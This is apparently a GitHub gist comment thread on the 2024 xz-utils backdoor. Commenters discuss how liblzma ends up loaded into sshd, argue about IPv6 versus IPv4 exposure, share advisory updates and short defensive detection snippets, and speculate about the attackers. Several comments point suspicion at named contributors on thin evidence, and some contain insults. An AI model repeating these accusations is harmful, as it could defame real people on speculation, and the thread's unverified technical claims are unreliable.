
I also find it weird that one would add the test files from xz when they're actually not used in the tests, from what I understood.

In my personal opinion, based on the current evidence of long-term lurking and preparation, it can be inferred that this individual has motives and plans, thinks clearly and cautiously, and the information related to their background and daily routine may be distorted or manipulated. Any records left behind could potentially be intentional.

I agree, given the obfuscation to try to make it happen "in plain sight", it would certainly have been prepared with crafted personas to point fingers in a different direction should it be discovered.
There are so many possibilities behind this that, at layman level, we can only speculate, and only intelligence agencies can get to the bottom of this.

For those who like to imagine stories, theories and are averse to Occam's razor (others can skip) you can start with checking when gzip was replaced by xz, and what the history behind LZMA is. You can also check the timeline of when JiaT75 was activated. Also remember old news, read wikipedia articles here, there, here and also read tech news like this, or this, and you can imagine hundreds of possible stories. You can also throw away Occam's razor, and imagine others used that to do triple or quadruple finger-pointing indirections.

But don't read too much, one might end up hallucinating more than an LLM.

For sure, intelligence agencies have mapped out all possibilities and are investigating them all.

@pillowtrucker

Reminder: the z-anomyous's guy original claim to expertise is that he supposedly wrote advanced programmes like this https://www.cvedetails.com/cve/CVE-1999-1208/ for "commercial unix" 25 years ago. Not that I believe he's ever even seen AIX or HPUX, but that's a pretty funny claim considering those unixes were notoriously awful and a general laughing stock in terms of engineering AND security.
Now your smoking gun to blame another Chinese guy is that he made a blog about the allocator ?
I'm not sure if you're really good at masking malice as incompetence, or if you're genuinely a low iq schizophrenic.
All Easter spent trying to blame China.

@Z-nonymous

Z-nonymous commented Apr 3, 2024

Now your smoking gun to blame another Chinese guy is that he made a blog about the allocator ?

Read this https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504

The malware implements a custom allocator, which is obtained from get_lzma_allocator @ 0x4050

Reminder: the z-anomyous's guy original claim to expertise is that he supposedly wrote advanced programmes like this https://www.cvedetails.com/cve/CVE-1999-1208/ for "commercial unix" 25 years ago.

That CVE 👍 I never understood why one in their right mind would count starting with 0.
Past experience was more of a disclaimer saying I might be wrong, and for sure Linux, bash and gcc work differently. Feel free to understand it as argument of authority if you believe experience 25 years ago on a different OS is what that means.

Also, not sure why you're giving someone adding the compromised unused xz test files into cpython repo more forgiveness than me, when I've disclaimed ahead I'm not expert of the topic and could be wrong.

All Easter spent trying to blame China

Me? Where? Just for the joke, in my previous post I added some facts that can justify that there are strong leads to other countries that could be behind it. And that's not even picked up in your claim. Read again and see how I'm making fun of speculating about who is behind the attack.

I don't know who, and I don't think it actually matters who is behind the attack.

Maybe it's important to see what the attack is really targeting. There is strong evidence that parts of the script try to limit it to some architectures.
As noted by some, some parts make no sense, like the previously mentioned checks on $build, which appear not to work with how it's populated with eval.

Sure, x86 is the target, but since other architectures were added in recent years, are these really being exempted, or targeted too? Do all those RISC-specific architecture code changes actually belong in all those tools? Are they supposed to prevent using faulty code on said architecture or not?

Those are legitimate questions. Raising awareness is not accusing a country.

I think it's also worth remembering that some hardware, like x86 Intel/AMD, is under trade bans for some countries actually at war. Maybe in some remote geography that's not that big of a threat. Countries could modify their architecture supply chains to pursue their plans or not.

@AdrianBunk

Could logs from git.tukaani.org give us more detail about commits, like what IP they came from, merge time vs. commit time, etc.? I think GitHub surely has it, but I'm not sure about Lasse's logs; they would already be a few years old.

No:

https://tukaani.org/xz-backdoor/

Only I have had access to the main tukaani.org website, git.tukaani.org repositories, and related files.

@xry111

xry111 commented Apr 3, 2024

Could logs from git.tukaani.org give us more detail about commits, like what IP they came from, merge time vs. commit time, etc.? I think GitHub surely has it, but I'm not sure about Lasse's logs; they would already be a few years old.

No:

https://tukaani.org/xz-backdoor/

Only I have had access to the main tukaani.org website, git.tukaani.org repositories, and related files.

Well, I thought GH was the mirror of git.tukaani.org but the fact is the opposite.

Then maybe MS can find something in the log of GitHub. And maybe we can use GH API to gather some info when the repo is re-enabled.

@Artoria2e5

Artoria2e5 commented Apr 3, 2024

@wibeipummedo says: Saw an interesting commit over in cpython: python/cpython@ea51476

It's part of PR python/cpython#115989

The bytecode there

It's not "bytecode". It's real instructions that you should be able to disassemble.

seem to be .xz test files from the 5.6.1 release.

It happens to be from 5.6.1, but was it added in 5.6.1?

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

It adds bloat, that we are sure of. But as far as the invocation is involved, it is benign and neither runs the code nor triggers the backdoor.

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53)

That's a documentation commit. The most parsimonious result would be that Wong, like the unfortunate 1password guy and the... (what's the embedded thing called? anyway, someone went to update the project url and license) guy, is just being too excited about new versions. The only difference is that he's got a Sinitic name.

The blog post is also not good proof. Dude sounds like he's new to the codebase, which he might really be!


Re: romanization

Around my part of the world, it's not too rare for online people (including programming people) to dabble in Sinitic romanizations and Sinitic topolects. Sometimes they just get weird ideas about "which romanization is best", about as meaningful as debating which Unicode normalization method is best.

"Ch'ien Wang" is a more normal spelling under Wade-Giles. I think zacanger has gotten it right. The final change to "Wong" is not-Mandarin, but it's kinda justified by being fashionable.

At least we're still mostly dealing with Mandarin.

@zacanger

zacanger commented Apr 3, 2024

@lhmouse

No transliteration scheme for Mandarin

Jyutping (Canto). That does kind of stand out to me, but I'm not a native speaker, I don't know if anyone would usually mix the two.

Around my part of the world, it's not too rare for online people (including programming people) to dabble in Sinitic romanizations and Sinitic topolects. Sometimes they just get weird ideas about "which romanization is best", about as meaningful as debating which Unicode normalization method is best.

@Artoria2e5 thank you for clarifying

@4i8

4i8 commented Apr 3, 2024

If gnu/linux is hackable, then nothing is secure anymore.

@christoofar

christoofar commented Apr 3, 2024

If gnu/linux is hackable, then nothing is secure anymore.

define "secure".

If more users pushed to IPv6-only and raised the expense of scanning the network a lot higher, the giant increase in failed TCP dials would be easier for network carriers to see and deal with.

any vps/cloud provider not giving you a healthy sized IPv6 range by default is garbage, and configured and turned on in their bake scripts so there is no excuse

cloudflare should demand edges go on to IPv6-only and not have 80/8080/443 open on IPv4, then sunset allowing edges having sshd on standard ports

the IPv4 universe is in a fucked state. I don't know why anyone thinks they can deal with serving anything on that network unless they have an incident response center in 5 time zones. I never serve sshd out on it. Moving the port lowers the scan hits quite a bit, IPv6 drops them waaaay down.

I hate this network I wish it would end.

@christoofar

christoofar commented Apr 3, 2024

For those of you who just want a secure way to sshd to do your admin and IPv6 is never happening in the near term, then check out Loki or Yggdrasil. Ygg is dead-easy to set up. Your distro probably already has a package for it, or you can build it yourself. You don't need to join it to public Ygg nodes (by not joining the public Ygg network, that creates your own private IPv6 encrypted network automatically. if any of your peers in your network is configured to join another Ygg network, then that bridges the two networks together).

Within your LAN if IPv6 broadcasting works, nodes you add will find each other and link up. It's like OpenVPN but just-add-water. https://yggdrasil-network.github.io

Then you can iptables/ufw whitelist the nodes you're bridging across IPv4 private-public. This step prevents anyone attacking your Ygg bridge much less seeing it.

You can also whitelist the hostkeys themselves in yggdrasil.conf to limit what can pair. (if you don't do the keys, then do the iptables)

Once you have that up, you can go into sshd_config on your public server and stop serving out on IPv4 completely or do whatever you need to do to close the port to the Internet.

It also handles the case where your ISP won't even let you host anything---now you can (by setting up Ygg on a vps and going back to your host and adding it as a peer).

@christoofar

christoofar commented Apr 4, 2024

Lasse updated his Plans section and mentions that the Jia code may be going to a git museum repo, he will rebase Jia out of xz in a 5.8.0 release.

Plans
I plan to write an article how the backdoor got into the releases and what can be learned from this. I’m still studying the details.

xz.git needs to be gotten to a state where I’m happy to say I fully approve its contents. It’s possible that the recent commits in master will be rebased to purge the malicious files from the Git history so that people don’t download them in any form when they clone the repo. The old repository could still be preserved in a separate read-only repository for history: the contents of its last commit could equal some commit in the new repository.

These will unfortunately but obviously take several days.

A clean XZ Utils release version could jump to 5.8.0. Some wish that it clearly separates the clean one from the bad 5.6.x.

https://tukaani.org/xz-backdoor/
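
Since the thread keeps coming back to "the bad 5.6.x", here is a minimal sketch of checking a version string against the two releases named in the advisory (5.6.0 and 5.6.1). It assumes the text comes from something like `xz --version`; the function names are made up for illustration, and a clean result only reflects the self-reported version, nothing more.

```python
import re

# The two releases identified as carrying the backdoor.
BACKDOORED = {(5, 6, 0), (5, 6, 1)}

def parse_versions(version_output):
    """Return every x.y.z version found in the text as a tuple of ints."""
    return [tuple(int(part) for part in match.groups())
            for match in re.finditer(r"\b(\d+)\.(\d+)\.(\d+)", version_output)]

def is_backdoored(version_output):
    """True if any version mentioned in the text is a known-bad release."""
    return any(version in BACKDOORED for version in parse_versions(version_output))
```

On a live system the input could be obtained with `subprocess.run(["xz", "--version"], capture_output=True, text=True).stdout`, assuming `xz` is on the PATH.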

@christoofar

with libsystemd rolling out the dlopen() change and OpenSSH adding support for systemd notify...
openssh/openssh-portable@08f5792

sad day for Jia.

@christoofar

christoofar commented Apr 4, 2024

The blog post is also not good proof. Dude sounds like he's new to the codebase, which he might really be!

He created a blog, and made one post, about his excitement of Jia's optimized memory allocator.

Which is not an optimized memory allocator. 💅

If he was excited about RISCV support going into liblzma, he would have finished the CPython binding changes and written one test that just passes a simple array to liblzma with the feature flags turned on.

If he was performance testing his board for some project, he could have forked CPython to stuff test bloat oh cool no local tests in his own fork, he shipped all the edits over... and convenience scripts (none in his fork) then called Jia and ask him to pull them down so Jia can then pin a launcher from the CPython testbed to see what's going on. Iiiiiiiii dunnnnoooo I would have left my tests in my fork and cherry pick out of that branch what I want to send to CPython if I had a board in my lap and wanted Jia's change so I can make that supercool, supercompacted whatever.

Just.... think about it.

@rdebath

rdebath commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys.
If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off.
Or just filter your logs another way and snigger at them wasting their time rattling your door.

@0x1eef

0x1eef commented Apr 4, 2024

@pillowtrucker

... or if you're genuinely a low iq schizophrenic.

There's no need for that, and you don't prove yourself more responsible than Z-nonymous by posting comments like that. Mental illness is not a joke, and shouldn't be used to score cheap points like that. It's not that far from racism, maybe one day you'll realize that.

@duracell

duracell commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys. If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off. Or just filter your logs another way and snigger at them wasting their time rattling your door.

This doesn't help you with a vulnerable ssh version like this exploit or a bug.

@rdebath

rdebath commented Apr 4, 2024

@duracell Nor does being on IPv6. This issue has a lot of hallmarks of being a very long term targeted attack. In that case the attacker knows who they want to attack and likely has a DNS lookup to point at them. If you want to reduce your attack surface filtering IPs is not really effective.

Reducing the libraries you link is ... for example don't link the obesity that is systemd. BTW: Don't think I'm trying to assign any blame here; but if you're not using systemd, this is why "libelogind0" exists at all, and that may be a reasonable way to break the attack chain. It's one of the things that gives me a relaxed attitude to this exploit.

These are also the reasons I think this exploit is a failure, it was discovered too soon.
Thank you "Andres Freund".

@bogd

bogd commented Apr 4, 2024

@duracell Nor does being on IPv6.

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

For anyone thinking that IPv6 will solve the issue by just being "too difficult to scan", please think again. I still remember a 2007 presentation by Randy Bush, that explains this very well (slide 16).

Add that to what @rdebath already mentioned (this does look like something to be used for targeted attacks, and if you have a target you generally know how to reach that).

@duracell

duracell commented Apr 4, 2024

I never said anything about ipv6, I only said fail2ban and brute-force protection will not help with such exploits.

But to say something about this, here is my point:
Your general anti-“too difficult to scan” message is bs.
Slide 16 says:

  • It is true that address space scanning will be somewhat harder
  • Ha Ha, think botnet scanning and a black market in hot space

1. It says “harder”!
2. 17 YEARS are gone, and where is the proof about the 2nd point?

And this is just a presentation.
You should look at the current state of public scanning or even the paper from Akamai.
The truth is: Scanning is a lot, lot harder and for the whole space nearly impossible for a single person or even a normal-sized group without a lot of money. Regular scanning even more.
Of course, if it's a targeted attack and uses publicly known IP addresses, then it's not that much harder than IPv4. But for exploits in general, widespread IPv6 can help to slow down mass attacks.
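
To put rough numbers on "a lot, lot harder": the sketch below compares a brute-force sweep of the whole IPv4 space with a sweep of one IPv6 /64 subnet. The probe rate of one million addresses per second is purely an assumption for illustration, and it says nothing about smarter target-generation techniques, which is the counter-argument raised in this thread.

```python
IPV4_ADDRESSES = 2 ** 32         # the entire IPv4 address space
IPV6_SUBNET_ADDRESSES = 2 ** 64  # a single IPv6 /64 subnet

def seconds_to_scan(address_count, probes_per_second):
    """Time for one exhaustive sweep at a constant probe rate."""
    return address_count / probes_per_second

RATE = 1_000_000  # assumed probes per second, not a measured figure

ipv4_hours = seconds_to_scan(IPV4_ADDRESSES, RATE) / 3600
ipv6_years = seconds_to_scan(IPV6_SUBNET_ADDRESSES, RATE) / (3600 * 24 * 365)

print(f"IPv4, whole space: {ipv4_hours:.1f} hours")
print(f"IPv6, one /64:     {ipv6_years:,.0f} years")
```

At the assumed rate this comes out to a bit over an hour for all of IPv4 and more than half a million years for a single /64, which is why blind sweeps are impractical on IPv6 while targeted lookups are not affected at all.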

@orangepizza

orangepizza commented Apr 4, 2024 via email

@bogd

bogd commented Apr 4, 2024

I never said anything about ipv6, I only said fail2ban and brute-force protection will not help with such exploits.

I was not replying to you, but to a different message that was quoting you (and in turn it was referring to a message from @christoofar ). Yes, I agree with you on the fail2ban part - it will not protect you from such an exploit. And probably none of the other mentioned workarounds will protect you against an application-level exploit/backdoor.

As for the second part, you missed the point entirely. :) . Yes, IPv6 scanning is harder (nobody ever contested that), but that doesn't mean that this can be used as a "security mechanism". That was what the "ha ha" on the slide was about.

Your first link seems to only talk about IPv4 scanning (and I did not see any relevant statistics on that page).

where is the proof about the 2nd point?

Probably waiting (together with the rest of us) for large-scale IPv6 adoption :p . Even the paper you linked says that:

"It may well be that the relative rarity of largescale IPv6 scans is simply the result of the inability to “cheaply” find destination addresses to probe. However, we argue this situation may quickly change if and when targetable IPv6 addresses become more available, be it due to advances in target generation algorithms, or exposure of addresses, e.g., via peer-to-peer applications or other rendezvous mechanisms employed by future applications"

Anyway, this is not the place for this conversation. Let us get back to the interesting part, the current exploit. :)

@christoofar

christoofar commented Apr 4, 2024

@duracell Nor does being on IPv6.

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

For anyone thinking that IPv6 will solve the issue by just being "too difficult to scan", please think again. I still remember a 2007 presentation by Randy Bush, that explains this very well (slide 16).

Add that to what @rdebath already mentioned (this does look like something to be used for targeted attacks, and if you have a target you generally know how to reach that).

I understand that. But the IPv4 universe is still super-fucked. Live targets compacted into a small universe white-hot with scanners. You still have to break defaults when hosting on IPv6 in the lower-temperature environment.

The shitshops/skids would be left having to use advanced techniques and rely on fewer devs and information (analyzing traffic, ingesting pilfered web logs, etc) to harvest target lists. There's just no reason, no reason at all, to put sshd hosted on defaults on to IPv4, which is what most people are doing. Every cloud provider is doing. It's crazytown.

And with xz we have now understood, very well, the issue of hot-loading, which tells you how good the code of OpenSSH has become because that was a technique few people thought feasible in a closed environment. Which systemd is reducing the temperature even more with dlopen() (it doesn't solve it).

@christoofar

christoofar commented Apr 4, 2024

Of course, if it's a targeted attack and uses publicly known IP addresses, then it's not that much harder than IPv4. But for exploits in general, widespread IPv6 can help to slow down mass attacks.

The cheapest thing to do is to go after caches of weblogs to collect/guess pools where there are clusters of hosts because Provider X misconfigured and handed out clients a small range. Like astronomers who write image filter code to sort out background stars looking for fuzzy balls that are galaxies or nebulae.

It's not perfect. Stop poo-pooing IPv6 because it isn't perfect. It is still preferable to v4.

Everyone has an Internet device talking a lot more on v6 than on v4. It's probably your phone. It's your Starlink router. The future is now. Get sshd off the IPv4 network. Just do it.

If you can't/won't, then why not shove it behind OpenVPN? Or set up port knocking? Or, as I mentioned... take a look at Yggdrasil which gives you a virtual IPv6 encrypted network with minimal fuss with way less setup headache?

@christoofar

christoofar commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys. If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off. Or just filter your logs another way and snigger at them wasting their time rattling your door.

This doesn't help you with a vulnerable ssh version like this exploit or a bug.

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.

Hot-loading is when libA which is doing just fine in production when loaded on to executable hosts, now has a change introduced because libB is going to be hot-loaded (LD_PRELOAD or, as we've seen it's systemd doing it) to make the code in libB get into memory and its initters get called, wanting to change the environment/state/data that libA usually runs under.

That's why the dlopen() changes to systemd matter.

How did liblzma get hotloaded? systemd did that (because journald), and also because OpenSSH did not want to bring in libsystemd to support its UNIX socket notify feature to signal readiness-to-serve. They have to support more OSes than just Linux (primary is BSD). Distros were taking patches to OpenSSH to get sshd to use this feature. THAT step matters because that is what created the hot-loading situation!
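
One way to see this on a Linux box is to look at which shared objects are actually mapped into a running process. The sketch below parses the text of `/proc/<pid>/maps` and reports whether any `liblzma.so*` file is mapped. The helper names are hypothetical, reading another user's process (such as sshd) typically needs root, and finding liblzma loaded only shows the dependency path exists, not that the library is a backdoored build.

```python
import os

def mapped_libraries(maps_text):
    """Return the set of file paths mapped into a process, given /proc/<pid>/maps text."""
    paths = set()
    for line in maps_text.splitlines():
        # Fields: address range, perms, offset, device, inode, optional pathname.
        fields = line.split(None, 5)
        if len(fields) == 6 and fields[5].startswith("/"):
            paths.add(fields[5])
    return paths

def loads_liblzma(maps_text):
    """True if any mapped file looks like liblzma.so (any version suffix)."""
    return any(os.path.basename(path).startswith("liblzma.so")
               for path in mapped_libraries(maps_text))
```

For a live check, something like `loads_liblzma(open(f"/proc/{pid}/maps").read())` with the pid of the sshd listener would do, assuming sufficient privileges.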

But any software, really, is vulnerable to hotloading. You have one thing that runs as root and pulls from an unwatched patching cycle, it is an invitation to hot-load. It doesn't have to be systemd as the root launcher, it can happen inside the ecosphere of some package you run, too.

Laughing and pointing fingers like a dumbshit saying "huhuhuh I run ${FAVORITE_OS} not a problem there"... yeah no ALL software is vuln to this.

@duracell

duracell commented Apr 4, 2024

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.

If you want to be precise, ssh was the vulnerable component, because the attack targets ssh and the functions of ssh.
You connect to ssh with a specific key which includes the malicious commands. Without the ssh connection this exploit wouldn't work.
It is indeed not a bug or exploit in the (upstream) ssh code itself. It was vulnerable because of the patches, but it was the vulnerable part to the outside and a necessary part of the exploit.

@christoofar

christoofar commented Apr 4, 2024

I should note: there's some software landscapes where hotloading is the norm because that's just the way things go. The Asterisk project is a great example. Plugins are written as C modules/patches so no-surprise that you might need X feature ("I wanna write something that injects custom SIP headers") and you need a dependency elsewhere but you don't want to touch the PJSIP module itself, or you reduce your change to a small nugget to keep up with updates to PJSIP. (Edit: you set the module loading order to your need and then launch with LD_PRELOAD to force your deps in, then your module/patch can do whatever it needs to do to PJSIP. This is just how things work over there.)

In closed-source vendor land that behavior is everywhere.

Dependency hijacking is a thing .NET people have been dealing with for eons now and they are further ahead (lib signing, centralized and well-understood assembly loading behavior, etc). But, again... everything everywhere is subject to hotloading. Just like injected static includes creeping into an unprotected repo, it can be dynamic, too.

@christoofar

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.

If you want to be precise, ssh was the vulnerable component, because the attack targets ssh and the functions of ssh. You connect to ssh with a specific key which includes the malicious commands. Without the ssh connection this exploit wouldn't work. It is indeed not a bug or exploit in the (upstream) ssh code itself. It was vulnerable because of the patches, but it was the vulnerable part to the outside and a necessary part of the exploit.

I'm going to target your dishwasher. Your dishwasher is the vulnerable component.

@dnorthup-ums

dnorthup-ums commented Apr 4, 2024

@thesamesam
Sam, et al:
I think there's another "Easter Egg" in there... Looking again, closely, at Lasse's f9cf4c05 commit (the tukaani repo) and his 02e35059 commit, and then re-reading the build tools scripts, it looks like "Jia" intended to be able to use TCP connections from inside of XZ on platforms built with CMAKE. There's got to be some way to invoke that. Perhaps he hadn't finished implementing that part yet..., but I think that somebody with better fuzzing skills than mine should give it a close look. The good news is that Lasse re-enabled the Landlock function for CMAKE builds...., presuming that "Jia" hadn't hidden something in the Landlock code.

@christoofar

christoofar commented Apr 4, 2024

By the way, I have not proven our enthusiastic CPython user is guilty beyond a reasonable doubt of being Team Jia, but this is the most stinky fish of all the associated cross-committers looking to push up Jia's changes.

It's not that Mr. CPython found a 0day in decrypt/encrypt... my suspicion is the audience that Mr. CPython would have created with his PR to CPython. The test he submitted cannot be run unless you force up the dependency, because in the binding code the feature flag is tied to the release level of liblzma. Tinkerboard people tend to be IT professionals with day jobs in corporate land. I don't know anyone around me in my inner circle, that is a nerd, who doesn't have a tinkerboard. Granted, not RISCV... but RISCV I'm going to assume audience is the same and more avid tinkerboard project users.

And even if Mr. CPython is completely innocent here... the adoption to push up is there, and when CPython lands for all chipsets and OS platforms everyone's Python code using lzma whether they know it or not will host Jia. Jia now has a worldwide entrypoint to ship to everything, everywhere, even in locked-down shit like QNX if that OS moves up because CPython did.

So... the panicky headlines from the tech press are, to some degree, justified.

Mr. CPython started a promo website all-excited about his interest in the liblzma memory allocator (that is not a memory allocator). And well, I want to testbed the CPython PR that was kicked out against Jia's RISCV feature enhancement. How much of a performance gain is this?

So I have ordered a RISCV tinkerboard off of Amazon.

@fungilife

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.
If you want to be precise, ssh was the vulnerable component

I'm going to target your ..... is the vulnerable component.

There is so much fan-boyism going on here that you will never get a consensus that all systems without systemd couldn't possibly have this problem. They will diffuse and divert the discussion to produce "doubt", "reasonable doubt", and the entire subject will be shoved under the carpet in a short while.

The fact that tests were done on a compromised system with all the necessary conditions/ingredients, but sshd was started manually and no backdoor was found seems to have gone over everyone's head.

Meanwhile, everyone is talking xz/lzma, distros are rebuilding packages, but zstd is being built from, or hasn't since 3/29, from a preconfigured github tarball with lzma enabled (or is it not everyone doing this?).

You wanted automation and less sysadmin work, you looked down at custom scripts to setup services, .. here it came. If you leave honey out the bees and the ants will come.

@ostrosablin

It's not perfect. Stop poo-pooing IPv6 because it isn't perfect. It is still preferable to v4.

Not only is IPv6 a major failure (since its adoption is still low), but due to this, it hardly gets tested in many "IPv6-ready" products, if at all.

IPv6 is usable only in corporate environments, managed by a team of experienced network engineers. For most end users, it doesn't solve any real problems. In fact, it generates many more security concerns. Generally, enabling IPv6 would expose the entire network to the public internet. What makes it worse, some cheaper/older consumer routers don't even provide any mechanism to set up IPv6 connection filtering in their stock firmware, and would even happily expose their control panel to the public internet.

So, unless you really know what you're doing, IPv4 is the only way to go. Because being behind NAT gives a default opt-in behavior to accepting connections. On the other hand, IPv6 emphasizes direct connectivity, so it's much easier to accidentally backdoor a private network by exposing sensitive services, meant to be run privately, to the public internet.

And the xz-utils situation shows that moving to IPv6 would just expose you to more security risks and headaches (for example, I had xz 5.6.1 on one machine, but thankfully, I was using IPv4 and for this particular machine I didn't expose sshd to the public internet).

@duracell

duracell commented Apr 4, 2024

It's not perfect. Stop poo-pooing IPv6 because it isn't perfect. It is still preferable to v4.

So, unless you really know what you're doing, IPv4 is the only way to go. Because being behind NAT gives a default opt-in behavior to accepting connections. On the other hand, IPv6 emphasizes direct connectivity, so it's much easier to accidentally backdoor a private network by exposing sensitive services, meant to be run privately, to the public internet.

And the xz-utils situation shows that moving to IPv6 would just expose you to more security risks and headaches (for example, I had xz 5.6.1 on one machine, but thankfully, I was using IPv4 and for this particular machine I didn't expose sshd to the public internet).

The device which does NAT on IPv4 could be, and in all cases I know is, also the device which does the filtering for IPv6, and by default on all consumer products it does not allow any incoming connection request. So you have the same firewall security as with NAT but without the problem of port translation and other problems.

@Daniel15

Daniel15 commented Apr 4, 2024

Some of the commit links still go to the GitHub mirror at https://github.com/tukaani-project/xz/, which is still disabled. It'd be worth updating the links to go to the upstream repo, e.g. https://git.tukaani.org/?p=xz.git;a=commitdiff;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0

@redcode

redcode commented Apr 4, 2024

Has anyone tried to contact Chien Wong? He could have spoken privately with Jia Tan, and if so, he could have tried to communicate with him in Chinese. That might lead us to some other possible clue.

@dnorthup-ums

@sectosec

The serious part is that the guy named Neustradamus also pressured to push the liblzma update to 5.6.0, check: microsoft/vcpkg#37197

FWIW: microsoft/vcpkg#37199 (comment)

I have no assessment either way, but just thought it worth noting...
Then again, I've also managed to get banned from gulp for pointing out that they were shipping insecure code. I've been a FLOSS project lead before so I know it can be ultra hard to figure out who to trust and how much to trust them. (This is my $Dayjob github account, not my personal one...and much of my involvement in Open Source stuff predates github anyway.)

@AdrianBunk

Just came here to throw some links :

When someone creates a Github account solely for smearing another user, then the most suspicious person is the accuser.

After a quick look I would agree with opinions expressed elsewhere that the accused person is a bit weird, but the only connection with xz is one xz update request in one project.
"weird" includes "opened 2900 Github issues/MRs in the past 5 years", so when the accuser found a case where "a 2nd account comes in and asks for the feature" 3 months later there's no surprise that this has happened somewhere.

It would be good if everyone here refrains from participating in a witch hunt based on anonymous smearing.

@donington

As much as I have loved the discussions brought up in this thread, I would like to see it become more centered on the task at hand - the xz code situation. Everything that people have been mentioning is interesting, but a lot of it has lost focus on the task here.

I'd like to try to submit as fact that sshd was targeted. Not because it provided weakness directly. The sideline was from an outside code base, mostly patched in. The flaw was partially how it was a network service that provided an in - the listening socket.

@christoofar

There is so much fan-boyism going on here that you will never get a consensus that all systems without systemd couldn't possibly have this problem.

I'm not trying to "defend the BSDs" here. So don't look at it that way. Again, there's not a realistic magic thing that will stop unwanted hotloading, not even over at the "secure" OSes.

xz has taught me to get more bitchy about hotloading that I don't like. I feel that anyone sassing someone for asking "Why did you bring that in?" whether it's a FOSS discussion or at work, etc... the dev themselves are a red flag. Just explain why you brought the dep in and if you see the "ugh.. maybe a security concern?", then do the research. Look and see. Stop being a jerk.

Trying to play this unitary blame game thing is going nowhere, so we meet here.

The fact that tests were done on a compromised system with all the necessary conditions/ingredients, but sshd was started manually and no backdoor was found, seems to have gone over everyone's head.

On the RE chats/Discords, the resistance the .o has to being observed, and the great find that endbr instructions are really being used as tokens to locate the calling points, is genius.

(S/O to Stephano for figuring out how the locator works https://smx-smx.github.io/xzre/xzre_8h.html#details)

Meanwhile, everyone is talking about xz/lzma and distros are rebuilding packages, but zstd is still being built (or hasn't been rebuilt since 3/29) from a preconfigured GitHub tarball with lzma enabled (or is not everyone doing this?).

libsystemd also put dlopen() around zstd too. This backdoor is one of the craftiest things ever to have been written. Every decompiler shop is going to be studying this for months/years. We may need to be thinking of asking the chipset makers themselves for help. No doubt many of them have also been thinking about this, and are worried about the machines they run themselves.

You wanted automation and less sysadmin work, you looked down at custom scripts to setup services, .. here it came. If you leave honey out the bees and the ants will come.

Amen. Also did you notice OWASP themselves got a breach? https://therecord.media/owasp-foundation-warns-of-data-breach-resumes

@thesamesam
Author

Can we please keep the comments here focused on edits to the gist, new resources, and new developments? There are places for general discussion of the vulnerability but I need to keep the comments section not completely polluted so I don't miss important suggestions/edits/changes. Thanks.

@christoofar

christoofar commented Apr 5, 2024

Can we please keep the comments here focused on edits to the gist, new resources, and new developments? There are places for general discussion of the vulnerability but I need to keep the comments section not completely polluted so I don't miss important suggestions/edits/changes. Thanks.

@thesamesam 10-4.

On the RE effort, I am wondering whether, in the dumps that Jia saw from Gentoo/Debian, one of the x86_64 registers was being used as a debug marker.

Force flipping registers (but for Jia, it's going to be in an obfuscated way) is a common technique in old assembly programming, back when computers had big light boards and a STOP/RUN switch somewhere where you could inspect values by hand, as we all know. Focus has been so much on hunting down all the symbols, but now I think valgrind with the full register dump turned on across a bunch of projects that screamed in 5.6.0 might reveal something that's been missed. I'm off to go work on that and shut up on here :-)

@Leseratte10

I don't think there's currently any hints that the malware itself is doing that - but if you had the SSH port exposed it's possible that the attacker has abused the malware to get code execution on your machine and could then have installed or changed whatever he wanted, so if you want to be absolutely safe you'd need to reinstall.

@fiorins

fiorins commented Apr 5, 2024

Could Github add a check if the tarballs gets created with the code hosted on the platform ?

@AdrianBunk

Could Github add a check if the tarballs gets created with the code hosted on the platform ?

Please read the "Design" section in the FAQ where this topic is explained.

(And note that the tiny part of the backdoor that was only in the release tarballs could as well have been in git like the rest of the backdoor - everything in git was also under control of the attacker.)

@rifkidocs

just want to leave a trace here

@ZacharyDK

How would one even begin to try and break apart the malicious binary? Recommended tool suite?

@AdrianBunk

How would one even begin to try and break apart the malicious binary? Recommended tool suite?

Read the links under "Analysis of the payload", where people discuss the payload and how they have analyzed it.

@anzz1

anzz1 commented Apr 5, 2024

I really hope that the wakeup call people take from this is that the "move fast and break things" mentality should not apply to kernel nor core utilities. Stability and safety is much more important than new shiny features especially if Linux is to be the stable foundation for server and embedded applications running critical code in the future too. I really hope any people bullying maintainers to accept patches and new features to already perfectly functioning tools will be called out more often. If you desperately want a new feature, fork it and make your own.

I hope that people would understand to look back into what Linux was and what the core idea of it is, which I would describe as a collection of simple utilities (GNU) and the kernel to support them. Not anything else, everything that is complex, hard or time-consuming to audit, new feature that is controversial, should not be included in either the kernel, core utilities or major distros as default. You are not supposed to create these large monoliths like systemd which span their tentacles to the entire system and introduce not only a complex large codebase addition but also a single point of failure.

I also hope that the reflection from this isn't that we need more idiotic "mitigation" security features like AppArmor, position-independent-executables, stack canaries/protectors and such other band-aid "fixes" which create additional complexity that does not only hurt performance but is also fertile ground for new security holes and bugs to fester.

The only sane and safe way is to make the kernel and core utilities simple and lean so they are easy to audit, lift your foot from the pedal a bit so everything can be checked at least with several sets of eyes before moving forward. There is no need for any "mitigations" when the code itself is safe.

